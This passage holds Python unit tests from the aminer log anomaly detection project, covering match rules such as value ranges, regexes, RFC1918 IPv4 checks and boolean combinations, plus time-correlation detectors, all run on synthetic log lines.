from datetime import datetime, timezone


class RuleTest(TestBase):
    """
    Unittests for the match rules and match actions in aminer.analysis.Rules.

    NOTE: DebugMatchRule and DebugHistoryMatchRule are intentionally not tested, as there is not much to be tested.
    ParallelMatchRule is also not tested as it is very similar to the OrMatchRule.
    """

    # format of one printed event: timestamp, component class name, component description, line count, annotated match
    __expected_string = '%s This message was generated, when the unit were successful.\n%s: "%s" (%d lines)\n %s\n\n'
    match_s1 = 'match/s1'
    fixed_string = b'fixed String'
    match_any = 'match/any'
    alphabet = b'There are 26 letters in the english alphabet'
    model_syslog_time = '/model/syslog/time'
    model_syslog = '/model/syslog'
    match_ipv4 = 'match/IPv4'
    match_context_fixed_dme = MatchContext(b'25000')
    fixed_dme = FixedDataModelElement('s1', b'25000')
    match_element_fixed_dme = fixed_dme.get_match_element("fixed", match_context_fixed_dme)

    def test1event_generation_match_action(self):
        """This test case checks if events are generated and pushed to all event handlers."""
        description = "Test1Rules"
        # second handler with its own stream: both streams must end up with the identical event text
        output_stream2 = StringIO()
        message = 'This message was generated, when the unit were successful.'
# --- continuation of test1event_generation_match_action (the method starts above this chunk)
        match_context = MatchContext(b'25537')
        decimal_integer_value_me = DecimalIntegerValueModelElement('d1', DecimalIntegerValueModelElement.SIGN_TYPE_NONE,
                                                                   DecimalIntegerValueModelElement.PAD_TYPE_NONE)
        match_element = decimal_integer_value_me.get_match_element('match', match_context)
        stream_printer_event_handler2 = StreamPrinterEventHandler(self.analysis_context, output_stream2)
        t = time()
        event_generation_match_action = EventGenerationMatchAction('Test.%s' % self.__class__.__name__, message, [
            self.stream_printer_event_handler, stream_printer_event_handler2])
        self.analysis_context.register_component(event_generation_match_action, description)
        log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), t, event_generation_match_action)
        event_generation_match_action.match_action(log_atom)
        # both handlers received the same event ...
        self.assertEqual(self.output_stream.getvalue(), output_stream2.getvalue())
        # ... and its text is the message plus the annotated match
        self.assertEqual(self.output_stream.getvalue(), self.__expected_string % (
            datetime.fromtimestamp(t).strftime("%Y-%m-%d %H:%M:%S"), event_generation_match_action.__class__.__name__, description, 1,
            log_atom.parser_match.match_element.annotate_match('')))

    def test2atom_filter_match_action(self):
        """This test case proves the functionality of the AtomFilters: a SubhandlerFilter forwards the atom to its subhandler."""
        description = "Test2Rules"
        newMatchPathDetector = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], 'Default', False)
        logAtomFixedDME = LogAtom(self.fixed_dme.fixed_data, ParserMatch(self.match_element_fixed_dme), time(), newMatchPathDetector)
        subhandlerFilter = SubhandlerFilter([newMatchPathDetector])
        self.analysis_context.register_component(subhandlerFilter, description)
        self.analysis_context.register_component(newMatchPathDetector, description + "2")
        self.assertTrue(subhandlerFilter.receive_atom(logAtomFixedDME))

    def test3path_exists_match_rule(self):
        """This case tests the PathExistsMatchRule: it matches only when match/s1 is present in the parser match."""
        description = "Test3Rules"
        path_exists_match_rule = PathExistsMatchRule(self.match_s1, None)
# --- continuation of test3path_exists_match_rule (the method starts above this chunk)
        self.analysis_context.register_component(path_exists_match_rule, description)
        # element 's1' produces the path match/s1 -> rule matches
        self.fixed_dme = FixedDataModelElement('s1', self.fixed_string)
        t = time()
        match_context = MatchContext(self.fixed_string)
        match_element = self.fixed_dme.get_match_element('match', match_context)
        log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), t, path_exists_match_rule)
        self.assertTrue(path_exists_match_rule.match(log_atom))
        # element 's2' produces match/s2 -> the watched path is absent and the rule must not match
        self.fixed_dme = FixedDataModelElement('s2', self.fixed_string)
        match_context = MatchContext(self.fixed_string)
        match_element = self.fixed_dme.get_match_element('match', match_context)
        log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), t, path_exists_match_rule)
        self.assertTrue(not path_exists_match_rule.match(log_atom))

    def test4value_match_rule(self):
        """This case tests the ValueMatchRule: it matches only the exact configured value at match/s1."""
        description = "Test4Rules"
        value_match_rule = ValueMatchRule(self.match_s1, self.fixed_string, None)
        self.analysis_context.register_component(value_match_rule, description)
        self.fixed_dme = FixedDataModelElement('s1', self.fixed_string)
        match_context = MatchContext(self.fixed_string)
        match_element = self.fixed_dme.get_match_element('match', match_context)
        log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), 1, value_match_rule)
        self.assertTrue(value_match_rule.match(log_atom))
        # same path, different value -> no match
        self.fixed_dme = FixedDataModelElement('s1', b'another fixed String')
        match_context = MatchContext(b'another fixed String')
        match_element = self.fixed_dme.get_match_element('match', match_context)
        log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), 1, value_match_rule)
        self.assertTrue(not value_match_rule.match(log_atom))

    def test5value_list_match_rule(self):
        """This case tests the ValueListMatchRule: the parsed integer at match/d1 must be one of the listed values."""
        description = "Test5Rules"
        value_list_match_rule = ValueListMatchRule('match/d1', [1, 2, 4, 8, 16, 32, 64, 128, 256, 512], None)
        self.analysis_context.register_component(value_list_match_rule, description)
# --- continuation of test5value_list_match_rule (the method starts above this chunk)
        decimal_integer_value_me = DecimalIntegerValueModelElement('d1', DecimalIntegerValueModelElement.SIGN_TYPE_NONE,
                                                                   DecimalIntegerValueModelElement.PAD_TYPE_NONE)
        # 64 is in the list
        match_context = MatchContext(b'64')
        match_element = decimal_integer_value_me.get_match_element('match', match_context)
        log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), 1, value_list_match_rule)
        self.assertTrue(value_list_match_rule.match(log_atom))
        # 4711 is not
        match_context = MatchContext(b'4711')
        match_element = decimal_integer_value_me.get_match_element('match', match_context)
        log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), 1, value_list_match_rule)
        self.assertTrue(not value_list_match_rule.match(log_atom))

    def test6value_range_match_rule(self):
        """This case tests the ValueRangeMatchRule: both range bounds (1 and 1000) are inclusive, 0 and 1001 are outside."""
        description = "Test6Rules"
        value_range_match_rule = ValueRangeMatchRule('match/d1', 1, 1000, None)
        self.analysis_context.register_component(value_range_match_rule, description)
        decimal_integer_value_me = DecimalIntegerValueModelElement('d1', DecimalIntegerValueModelElement.SIGN_TYPE_NONE,
                                                                   DecimalIntegerValueModelElement.PAD_TYPE_NONE)
        match_context = MatchContext(b'1')
        match_element = decimal_integer_value_me.get_match_element('match', match_context)
        log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), 1, value_range_match_rule)
        self.assertTrue(value_range_match_rule.match(log_atom))
        match_context = MatchContext(b'1000')
        match_element = decimal_integer_value_me.get_match_element('match', match_context)
        log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), 1, value_range_match_rule)
        self.assertTrue(value_range_match_rule.match(log_atom))
        match_context = MatchContext(b'0')
        match_element = decimal_integer_value_me.get_match_element('match', match_context)
        log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), 1, value_range_match_rule)
        self.assertTrue(not value_range_match_rule.match(log_atom))
        match_context = MatchContext(b'1001')
        match_element = decimal_integer_value_me.get_match_element('match', match_context)
        log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), 1, value_range_match_rule)
        self.assertTrue(not value_range_match_rule.match(log_atom))

    def test7string_regex_match_rule(self):
        """This case tests the StringRegexMatchRule with the pattern \\w against the value at match/any."""
        description = "Test7Rules"
        string_regex_match_rule = StringRegexMatchRule(self.match_any, re.compile(rb'\w'), None)
        self.analysis_context.register_component(string_regex_match_rule, description)
        any_byte_date_me = AnyByteDataModelElement('any')
        match_context = MatchContext(self.alphabet)
        match_element = any_byte_date_me.get_match_element('match', match_context)
        log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), 1, string_regex_match_rule)
        self.assertTrue(string_regex_match_rule.match(log_atom))
        # the same text prefixed with '--> ' must not match; presumably the rule anchors the pattern at the start of
        # the value (search() would find a word character here) — confirm against StringRegexMatchRule
        match_context = MatchContext(b'--> There are 26 letters in the english alphabet')
        match_element = any_byte_date_me.get_match_element('match', match_context)
        log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), 1, string_regex_match_rule)
        self.assertTrue(not string_regex_match_rule.match(log_atom))

    def test8modulo_time_match_rule(self):
        """
        This case tests the ModuloTimeMatchRule.

        With modulo 86400 and limits 43200/86400 the rule matches timestamps whose second of the day (UTC) is 43200 or
        more (12:00 and 13:00 match, 00:00 and 01:00 do not).
        """
        description = "Test8Rules"
        modulo_time_match_rule = ModuloTimeMatchRule(self.model_syslog_time, 86400, 43200, 86400, None)
        self.analysis_context.register_component(modulo_time_match_rule, description)
        date_time_model_element = DateTimeModelElement('time', b'%d.%m.%Y %H:%M:%S', timezone.utc)
        match_context = MatchContext(b'14.02.2019 13:00:00')
        match_element = date_time_model_element.get_match_element(self.model_syslog, match_context)
        log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), time(), date_time_model_element)
        self.assertTrue(modulo_time_match_rule.match(log_atom))
        match_context = MatchContext(b'15.02.2019 00:00:00')
        match_element = date_time_model_element.get_match_element(self.model_syslog, match_context)
        log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), time(), date_time_model_element)
        self.assertTrue(not modulo_time_match_rule.match(log_atom))
        # lower limit is inclusive
        match_context = MatchContext(b'14.02.2019 12:00:00')
        match_element = date_time_model_element.get_match_element(self.model_syslog, match_context)
        log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), time(), date_time_model_element)
        self.assertTrue(modulo_time_match_rule.match(log_atom))
        match_context = MatchContext(b'15.02.2019 01:00:00')
        match_element = date_time_model_element.get_match_element(self.model_syslog, match_context)
        log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), time(), date_time_model_element)
        self.assertTrue(not modulo_time_match_rule.match(log_atom))

    def test9value_dependent_modulo_time_match_rule(self):
        """
        This case tests the ValueDependentModuloTimeMatchRule. Limit look up not working with tuples.

        The limits are looked up by the parsed value of /model/syslog/time: 1550145600 is 14.02.2019 12:00:00 UTC,
        which maps to the limits [43200, 86400] and therefore matches.
        """
        description = "Test9Rules"
        value_dependent_modulo_time_match_rule = ValueDependentModuloTimeMatchRule(self.model_syslog_time, 86400, [self.model_syslog_time],
                                                                                   {1550145600: [43200, 86400]})
        self.analysis_context.register_component(value_dependent_modulo_time_match_rule, description)
        date_time_model_element = DateTimeModelElement('time', b'%d.%m.%Y %H:%M:%S', timezone.utc)
        match_context = MatchContext(b'14.02.2019 12:00:00')
        match_element = date_time_model_element.get_match_element(self.model_syslog, match_context)
        # the atom timestamp (10:00 UTC on the same day) differs from the parsed value on purpose
        log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), 1550138400, date_time_model_element)
        self.assertTrue(value_dependent_modulo_time_match_rule.match(log_atom))

    def test10ipv4_in_rfc1918_match_rule(self):
        """This case tests the IPv4InRFC1918MatchRule: the private ranges 10/8, 172.16/12 and 192.168/16 match, their neighbours do not."""
        description = "Test10Rules"
        i_pv4_in_rfc1918_match_rule = IPv4InRFC1918MatchRule(self.match_ipv4)
        self.analysis_context.register_component(i_pv4_in_rfc1918_match_rule, description)
ip_address_data_model_element = IpAddressDataModelElement('IPv4') # private addresses match_context = MatchContext(b'192.168.0.0') match_element = ip_address_data_model_element.get_match_element('match', match_context) log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), time(), i_pv4_in_rfc1918_match_rule) self.assertTrue(i_pv4_in_rfc1918_match_rule.match(log_atom)) match_context = MatchContext(b'192.168.255.255') match_element = ip_address_data_model_element.get_match_element('match', match_context) log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), time(), i_pv4_in_rfc1918_match_rule) self.assertTrue(i_pv4_in_rfc1918_match_rule.match(log_atom)) match_context = MatchContext(b'172.16.0.0') match_element = ip_address_data_model_element.get_match_element('match', match_context) log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), time(), i_pv4_in_rfc1918_match_rule) self.assertTrue(i_pv4_in_rfc1918_match_rule.match(log_atom)) match_context = MatchContext(b'172.31.255.255') match_element = ip_address_data_model_element.get_match_element('match', match_context) log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), time(), i_pv4_in_rfc1918_match_rule) self.assertTrue(i_pv4_in_rfc1918_match_rule.match(log_atom)) match_context = MatchContext(b'10.0.0.0') match_element = ip_address_data_model_element.get_match_element('match', match_context) log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), time(), i_pv4_in_rfc1918_match_rule) self.assertTrue(i_pv4_in_rfc1918_match_rule.match(log_atom)) match_context = MatchContext(b'10.255.255.255') match_element = ip_address_data_model_element.get_match_element('match', match_context) log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), time(), i_pv4_in_rfc1918_match_rule) self.assertTrue(i_pv4_in_rfc1918_match_rule.match(log_atom)) # public addresses match_context = MatchContext(b'192.167.255.255') match_element = 
ip_address_data_model_element.get_match_element('match', match_context) log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), time(), i_pv4_in_rfc1918_match_rule) self.assertTrue(not i_pv4_in_rfc1918_match_rule.match(log_atom)) match_context = MatchContext(b'192.169.0.0') match_element = ip_address_data_model_element.get_match_element('match', match_context) log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), time(), i_pv4_in_rfc1918_match_rule) self.assertTrue(not i_pv4_in_rfc1918_match_rule.match(log_atom)) match_context = MatchContext(b'172.15.255.255') match_element = ip_address_data_model_element.get_match_element('match', match_context) log_atom = LogAtom(not match_context.match_data, ParserMatch(match_element), time(), i_pv4_in_rfc1918_match_rule) self.assertTrue(not i_pv4_in_rfc1918_match_rule.match(log_atom)) match_context = MatchContext(b'172.32.0.0') match_element = ip_address_data_model_element.get_match_element('match', match_context) log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), time(), i_pv4_in_rfc1918_match_rule) self.assertTrue(not i_pv4_in_rfc1918_match_rule.match(log_atom)) match_context = MatchContext(b'9.255.255.255') match_element = ip_address_data_model_element.get_match_element('match', match_context) log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), time(), i_pv4_in_rfc1918_match_rule) self.assertTrue(not i_pv4_in_rfc1918_match_rule.match(log_atom)) match_context = MatchContext(b'11.0.0.0') match_element = ip_address_data_model_element.get_match_element('match', match_context) log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), time(), i_pv4_in_rfc1918_match_rule) self.assertTrue(not i_pv4_in_rfc1918_match_rule.match(log_atom)) def test11and_match_rule(self): """This case unit the AndMatchRule.""" description = "Test11Rules" path_exists_match_rule = PathExistsMatchRule(self.match_ipv4, None) 
self.analysis_context.register_component(path_exists_match_rule, description) i_pv4_in_rfc1918_match_rule = IPv4InRFC1918MatchRule(self.match_ipv4) self.analysis_context.register_component(i_pv4_in_rfc1918_match_rule, description + "2") and_match_rule = AndMatchRule([path_exists_match_rule, i_pv4_in_rfc1918_match_rule]) self.analysis_context.register_component(and_match_rule, description + "3") ip_address_data_model_element = IpAddressDataModelElement('IPv4') match_context = MatchContext(b'192.168.0.0') match_element = ip_address_data_model_element.get_match_element('match', match_context) log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), time(), and_match_rule) self.assertTrue(and_match_rule.match(log_atom)) # changing to IPv6 path_exists_match_rule = PathExistsMatchRule('match/IPv6', None) and_match_rule = AndMatchRule([path_exists_match_rule, i_pv4_in_rfc1918_match_rule]) match_context = MatchContext(b'192.168.0.0') match_element = ip_address_data_model_element.get_match_element('match', match_context) log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), time(), and_match_rule) self.assertTrue(not and_match_rule.match(log_atom)) def test12or_match_rule(self): """This case unit the OrMatchRule.""" description = "Test12Rules" path_exists_match_rule = PathExistsMatchRule(self.match_ipv4, None) self.analysis_context.register_component(path_exists_match_rule, description) i_pv4_in_rfc1918_match_rule = IPv4InRFC1918MatchRule(self.match_ipv4) self.analysis_context.register_component(i_pv4_in_rfc1918_match_rule, description + "2") or_match_rule = OrMatchRule([path_exists_match_rule, i_pv4_in_rfc1918_match_rule]) self.analysis_context.register_component(or_match_rule, description + "3") ip_address_data_model_element = IpAddressDataModelElement('IPv4') match_context = MatchContext(b'192.168.0.0') match_element = ip_address_data_model_element.get_match_element('match', match_context) log_atom = LogAtom(match_context.match_data, 
ParserMatch(match_element), time(), or_match_rule) self.assertTrue(or_match_rule.match(log_atom)) # changing to IPv6 path_exists_match_rule = PathExistsMatchRule('match/IPv6', None) or_match_rule = OrMatchRule([path_exists_match_rule, i_pv4_in_rfc1918_match_rule]) match_context = MatchContext(b'192.168.0.0') match_element = ip_address_data_model_element.get_match_element('match', match_context) log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), time(), or_match_rule) self.assertTrue(or_match_rule.match(log_atom)) def test13value_dependent_delegated_match_rule(self): """This case unit the ValueDependentDelegatedMatchRule.""" description = "Test13Rules" string_regex_match_rule = StringRegexMatchRule(self.match_any, re.compile(rb'\w'), None) self.analysis_context.register_component(string_regex_match_rule, description) any_byte_date_me = AnyByteDataModelElement('any') i_pv4_in_rfc1918_match_rule = IPv4InRFC1918MatchRule(self.match_ipv4) self.analysis_context.register_component(i_pv4_in_rfc1918_match_rule, description + "2") ip_address_data_model_element = IpAddressDataModelElement('IPv4') value_dependent_delegated_match_rule = ValueDependentDelegatedMatchRule([ self.match_any, self.match_ipv4], {(self.alphabet,): string_regex_match_rule, (3232235520,): i_pv4_in_rfc1918_match_rule}) self.analysis_context.register_component(value_dependent_delegated_match_rule, description + "3") match_context = MatchContext(self.alphabet) match_element = any_byte_date_me.get_match_element('match', match_context) log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), 1, value_dependent_delegated_match_rule) self.assertTrue(value_dependent_delegated_match_rule.match(log_atom)) match_context = MatchContext(b'192.168.0.0') match_element = ip_address_data_model_element.get_match_element('match', match_context) log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), 1, value_dependent_delegated_match_rule) 
self.assertTrue(value_dependent_delegated_match_rule.match(log_atom)) # not matching values match_context = MatchContext(b'.There are 26 letters in the english alphabet') match_element = any_byte_date_me.get_match_element('match', match_context) log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), 1, value_dependent_delegated_match_rule) self.assertTrue(not value_dependent_delegated_match_rule.match(log_atom)) match_context = MatchContext(b'192.168.0.1') match_element = ip_address_data_model_element.get_match_element('match', match_context) log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), 1, value_dependent_delegated_match_rule) self.assertTrue(not value_dependent_delegated_match_rule.match(log_atom)) def test14negation_match_rule(self): """This case unit the NegationMatchRule.""" description = "Test14Rules" path_exists_match_rule = PathExistsMatchRule(self.match_s1, None) self.analysis_context.register_component(path_exists_match_rule, description) negation_match_rule = NegationMatchRule(path_exists_match_rule) self.analysis_context.register_component(negation_match_rule, description + "2") self.fixed_dme = FixedDataModelElement('s1', self.fixed_string) match_context = MatchContext(self.fixed_string) match_element = self.fixed_dme.get_match_element('match', match_context) log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), 1, path_exists_match_rule) self.assertTrue(path_exists_match_rule.match(log_atom)) self.assertTrue(not negation_match_rule.match(log_atom)) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/analysis/TimeCorrelationDetectorTest.py000066400000000000000000000105721437606560100316200ustar00rootroot00000000000000import unittest from unit.TestBase import TestBase from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from 
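aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.MatchContext import MatchContext from aminer.analysis.TimeCorrelationDetector import TimeCorrelationDetector import time from aminer.input.LogAtom import LogAtom from aminer.parsing.ParserMatch import ParserMatch from datetime import datetime


class TimeCorrelationDetectorTest(TestBase):
    """Unittests for the TimeCorrelationDetector."""

    __expected_string = '%s Correlation report\nTimeCorrelationDetector: "%s" (%d lines)\n '
    string = b'25537 uid=2'
    datetime_format_string = '%Y-%m-%d %H:%M:%S'
    fixed_dme = FixedDataModelElement('s1', string)
    decimal_integer_value_me = DecimalIntegerValueModelElement(
        'd1', DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE)
    # two FirstMatch elements over the same children in opposite order, so the same input yields two different matches
    match_context_first_match_me = MatchContext(string)
    first_match_me = FirstMatchModelElement('f1', [fixed_dme, decimal_integer_value_me])
    match_element_first_match_me = first_match_me.get_match_element('first', match_context_first_match_me)
    match_context_first_match_me2 = MatchContext(string)
    first_match_me2 = FirstMatchModelElement('f2', [decimal_integer_value_me, fixed_dme])
    match_element_first_match_me2 = first_match_me2.get_match_element('second', match_context_first_match_me2)

    def test1_normal_report(self):
        """
        Test the creation of a correlation report.

        As the rules are chosen randomly this test cannot be very specific in checking the actual values of the
        report; it only checks that the report header carries the timestamp of the last atom and the running
        line count (10, 20, 30) after each batch of record_count_before_event atoms.
        """
        description = "Test1TimeCorrelationDetector"
        parallel_check_count = 2
        record_count_before_event = 10
        output_logline = True
        use_path_match = True
        use_value_match = True
        min_rule_attributes = 1
        max_rule_attributes = 5
        time_correlation_detector = TimeCorrelationDetector(
            self.aminer_config, [self.stream_printer_event_handler], parallel_check_count, 'Default',
            record_count_before_event, output_logline, use_path_match, use_value_match, min_rule_attributes,
            max_rule_attributes)
        self.analysis_context.register_component(time_correlation_detector, component_name=description)
        t = time.time()

        # batch 1: ten atoms with the same timestamp
        for _ in range(0, 10):
            log_atom_sequence_me = LogAtom(
                self.fixed_dme.fixed_data, ParserMatch(self.match_element_first_match_me), t, time_correlation_detector)
            time_correlation_detector.receive_atom(log_atom_sequence_me)
        self.assertTrue(self.output_stream.getvalue().startswith(
            self.__expected_string % (datetime.fromtimestamp(t).strftime(self.datetime_format_string), description, 10)))
        self.reset_output_stream()

        # batch 2: ten atoms with increasing timestamps; the report is stamped with the last one (t + 9)
        for i in range(0, 10):
            log_atom_sequence_me = LogAtom(
                self.fixed_dme.fixed_data, ParserMatch(self.match_element_first_match_me), t + i, time_correlation_detector)
            time_correlation_detector.receive_atom(log_atom_sequence_me)
        self.assertTrue(self.output_stream.getvalue().startswith(
            self.__expected_string % (datetime.fromtimestamp(t + 9).strftime(self.datetime_format_string), description, 20)))
        self.reset_output_stream()

        # batch 3: five pairs of atoms from the two different matches (ten lines in total)
        for i in range(10, 15):
            log_atom_sequence_me = LogAtom(
                self.fixed_dme.fixed_data, ParserMatch(self.match_element_first_match_me), t + i, time_correlation_detector)
            time_correlation_detector.receive_atom(log_atom_sequence_me)
            log_atom_sequence_me2 = LogAtom(
                self.fixed_dme.fixed_data, ParserMatch(self.match_element_first_match_me2), t + i, time_correlation_detector)
            time_correlation_detector.receive_atom(log_atom_sequence_me2)
        self.assertTrue(self.output_stream.getvalue().startswith(
            self.__expected_string % (datetime.fromtimestamp(t + 14).strftime(self.datetime_format_string), description, 30)))


if __name__ == "__main__":
    unittest.main()
logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/analysis/TimeCorrelationViolationDetectorTest.py000066400000000000000000000260471437606560100335070ustar00rootroot00000000000000
import unittest
import time
from aminer.analysis.TimeCorrelationViolationDetector import CorrelationRule, EventClassSelector, TimeCorrelationViolationDetector
from aminer.analysis import Rules
from aminer.input.LogAtom import LogAtom
from aminer.parsing.ParserMatch import ParserMatch
from aminer.parsing.MatchContext import MatchContext
from aminer.parsing.FixedDataModelElement import FixedDataModelElement
from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement
from aminer.parsing.SequenceModelElement import SequenceModelElement
from unit.TestBase import TestBase
from datetime import datetime


class TimeCorrelationViolationDetectorTest(TestBase):
    """Unittests for the TimeCorrelationViolationDetector."""

    _expected_string = '%s Correlation rule "%s" violated\nTimeCorrelationViolationDetector: "%s" (%d lines)\n FAIL: '
    _expected_string_too_early = _expected_string + 'B-Event for "%s" (%s) was found too early!\n\n\n'
    _expected_string_too_late = _expected_string + 'B-Event for "%s" (%s) was not found in time!\n\n\n'
    _expected_string_different_attributes = _expected_string + '"%s" (%s) %d is not equal %d\n\n\n'
    model = '/model'
    datetime_format_string = '%Y-%m-%d %H:%M:%S'
    # sequence1 carries the integer in Value2, sequence2 carries it in Value3
    service_children1 = [
        FixedDataModelElement('Value1Key', b'Value1: '), FixedDataModelElement('Value1Value', b'fixed Value1'),
        FixedDataModelElement('Value2Key', b', Value2: '), DecimalIntegerValueModelElement('Value2Value'),
        FixedDataModelElement('Value3Key', b', Value3: '), FixedDataModelElement('Value3Value', b'fixed Value3'),
        FixedDataModelElement('Value4Key', b', Value4: '), FixedDataModelElement('Value4Value', b'fixed Value4')]
    service_children2 = [ FixedDataModelElement('Value1Key', b'Value1: '),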
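FixedDataModelElement('Value1Value', b'fixed Value1'), FixedDataModelElement('Value2Key', b', Value2: '), FixedDataModelElement('Value2Value', b'fixed Value2'), FixedDataModelElement('Value3Key', b', Value3: '), DecimalIntegerValueModelElement('Value3Value'), FixedDataModelElement('Value4Key', b', Value4: '), FixedDataModelElement('Value4Value', b'fixed Value4')]
    match_context1 = MatchContext(b'Value1: fixed Value1, Value2: 22500, Value3: fixed Value3, Value4: fixed Value4')
    match_context2 = MatchContext(b'Value1: fixed Value1, Value2: fixed Value2, Value3: 22500, Value4: fixed Value4')
    # same as match_context2 but with a different integer, used to trigger the attribute mismatch report
    match_context2_different = MatchContext(b'Value1: fixed Value1, Value2: fixed Value2, Value3: 22501, Value4: fixed Value4')
    seq1 = SequenceModelElement('sequence1', service_children1)
    seq2 = SequenceModelElement('sequence2', service_children2)
    match_element1 = seq1.get_match_element(model, match_context1)
    match_element2 = seq2.get_match_element(model, match_context2)
    match_element2_different = seq2.get_match_element(model, match_context2_different)

    def setUp(self):
        """
        Set up the rules for the TimeCorrelationViolationDetector.

        One CorrelationRule links the A-event (sequence1, selected via Selector1) to the B-event (sequence2,
        selected via Selector2) and requires Value2Value of the A-event to equal Value3Value of the B-event.
        The two numeric arguments (1, 1.2) are presumably the allowed time window in seconds - the tests below
        treat +1 as in time, ~+0 as too early and +5 as too late.
        """
        TestBase.setUp(self)
        self.correlation_rule = CorrelationRule('Correlation', 1, 1.2, artefact_match_parameters=[
            ('/model/sequence1/Value2Value', '/model/sequence2/Value3Value')])
        self.a_class_selector = EventClassSelector('Selector1', [self.correlation_rule], None)
        self.b_class_selector = EventClassSelector('Selector2', None, [self.correlation_rule])
        self.rules = []
        self.rules.append(Rules.PathExistsMatchRule('/model/sequence1/Value2Key', self.a_class_selector))
        self.rules.append(Rules.PathExistsMatchRule('/model/sequence2/Value3Key', self.b_class_selector))

    def _create_detector(self, description):
        """Create a TimeCorrelationViolationDetector over self.rules and register it under description."""
        time_correlation_violation_detector = TimeCorrelationViolationDetector(
            self.analysis_context.aminer_config, self.rules, [self.stream_printer_event_handler])
        self.analysis_context.register_component(time_correlation_violation_detector, component_name=description)
        return time_correlation_violation_detector

    def test1_check_status_ok(self):
        """
        In this test case the status is OK after receiving the expected data and no error message is returned.

        The B-event arrives one second after the A-event; do_timer must then print nothing.
        """
        description = "Test1TimeCorrelationViolationDetector"
        time_correlation_violation_detector = self._create_detector(description)
        log_atom1 = LogAtom(self.match_context1.match_data, ParserMatch(self.match_element1), time.time(), self)
        time_correlation_violation_detector.receive_atom(log_atom1)
        log_atom2 = LogAtom(self.match_context2.match_data, ParserMatch(self.match_element2), time.time() + 1, self)
        time_correlation_violation_detector.receive_atom(log_atom2)
        time_correlation_violation_detector.do_timer(time.time())
        self.assertEqual(self.output_stream.getvalue(), "")

    def test2_check_status_not_found_error(self):
        """
        In this test case the second log line is not found and an appropriate error message is expected from the check_status-method.

        check_status is called directly two seconds after the A-event; do_timer is not exercised here.
        """
        description = "Test2TimeCorrelationViolationDetector"
        time_correlation_violation_detector = self._create_detector(description)
        t = time.time()
        log_atom1 = LogAtom(self.match_context1.match_data, ParserMatch(self.match_element1), t, self)
        time_correlation_violation_detector.receive_atom(log_atom1)
        r = self.correlation_rule.check_status(t + 2)
        self.assertEqual(r[0], 'FAIL: B-Event for "%s" (%s) was not found in time!\n' % (
            self.match_element1.get_match_string().decode(), self.a_class_selector.action_id))

    def test3_check_status_before_expected_timespan(self):
        """
        In this test case the second log line is found too early.

        An appropriate error message is expected from the check_status-method; the output of the
        do_timer-method is also tested in this test case.
        """
        description = "Test3TimeCorrelationViolationDetector"
        time_correlation_violation_detector = self._create_detector(description)
        t = time.time()
        log_atom1 = LogAtom(self.match_context1.match_data, ParserMatch(self.match_element1), t, self)
        time_correlation_violation_detector.receive_atom(log_atom1)
        # the B-event is stamped (almost) at the same time as the A-event, i.e. before the window opens
        log_atom2 = LogAtom(self.match_context2.match_data, ParserMatch(self.match_element2), time.time(), self)
        time_correlation_violation_detector.receive_atom(log_atom2)
        time_correlation_violation_detector.do_timer(time.time())
        self.assertEqual(self.output_stream.getvalue(), self._expected_string_too_early % (
            datetime.fromtimestamp(t).strftime(self.datetime_format_string), self.correlation_rule.rule_id, description, 1,
            self.match_element1.get_match_string().decode(), self.a_class_selector.action_id))

    def test4_check_status_after_expected_timespan(self):
        """
        In this test case the second log line is found too late.

        An appropriate error message is expected from the check_status-method; the output of the
        do_timer-method is also tested in this test case.
        """
        description = "Test4TimeCorrelationViolationDetector"
        time_correlation_violation_detector = self._create_detector(description)
        t = time.time()
        log_atom1 = LogAtom(self.match_context1.match_data, ParserMatch(self.match_element1), t, self)
        time_correlation_violation_detector.receive_atom(log_atom1)
        log_atom2 = LogAtom(self.match_context2.match_data, ParserMatch(self.match_element2), t + 5, self)
        time_correlation_violation_detector.receive_atom(log_atom2)
        time_correlation_violation_detector.do_timer(time.time())
        self.assertEqual(self.output_stream.getvalue(), self._expected_string_too_late % (
            datetime.fromtimestamp(t).strftime(self.datetime_format_string), self.correlation_rule.rule_id, description, 1,
            self.match_element1.get_match_string().decode(), self.a_class_selector.action_id))

    def test5_check_status_attributes_not_matching(self):
        """
        In this test case the second log line has different attributes than expected.

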